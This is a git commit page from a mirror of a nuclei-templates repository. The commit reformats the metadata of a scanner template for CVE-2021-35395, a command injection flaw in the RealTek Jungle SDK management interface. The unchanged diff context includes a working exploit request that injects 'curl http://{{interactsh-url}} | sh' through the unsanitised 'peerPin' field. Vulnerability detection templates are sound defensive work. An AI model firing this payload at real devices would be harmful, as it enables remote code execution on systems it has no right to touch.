daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2021-35395.yaml

patch-1
Ritik Chaddha 2023-11-10 16:15:16 +05:30 committed by GitHub
parent 47869080a6
commit ed665729a0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
http/cves/2021/CVE-2021-35395.yaml
View File

@ -4,14 +4,14 @@ info:
name: RealTek Jungle SDK - Arbitrary Command Injection
author: king-alexander
severity: critical
description: There is a command injection vulnerability on the "formWsc" page of the management interface.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
remediation: |
Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
description: |
There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35395
- https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
metadata:
max-request: 1
tags: cve,cve2021,realtek,rce,kev
http:
@ -20,7 +20,7 @@ http:
POST /goform/formWsc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
# The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
matchers-condition: and